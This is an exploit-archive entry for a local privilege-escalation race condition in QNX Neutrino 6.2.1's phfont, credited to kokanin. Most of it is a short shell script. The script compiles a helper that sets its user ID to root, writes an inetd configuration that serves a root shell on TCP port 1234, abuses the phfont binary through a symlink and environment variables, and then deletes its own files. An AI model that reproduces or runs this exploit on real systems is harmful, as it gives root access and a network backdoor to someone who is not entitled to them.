QNX Neutrino 6.2.1 (phfont) Race Condition Local Root Exploit

2006-02-08T00:00:00
ID 1337DAY-ID-7514
Type zdt
Reporter kokanin
Modified 2006-02-08T00:00:00

Description

Exploit for QNX platform in category local exploits

                                        
                                            =============================================================
QNX Neutrino 6.2.1 (phfont) Race Condition Local Root Exploit
=============================================================


#!/bin/sh
# [email protected] 18/10/2003
# $ cksum /usr/photon/bin/phfont
# 4123428723      30896 /usr/photon/bin/phfont
# $ uname -a
# QNX localhost 6.2.1 2003/01/08-14:50:46est x86pc x86 
cat > phfontphf.c << __EOF__
int main(){
setuid(0);
system("echo 1234 stream tcp nowait root  /bin/sh       sh -i>/tmp/dsr && /usr/sbin/inetd /tmp/dsr");
} 
__EOF__
make phfontphf >/dev/null
ln -s /usr/photon/bin/phfont ./phfont
export PHFONT=hello
export PHOTON2_PATH=mom
./phfont
rm phfont*




#  0day.today [2018-03-01]  #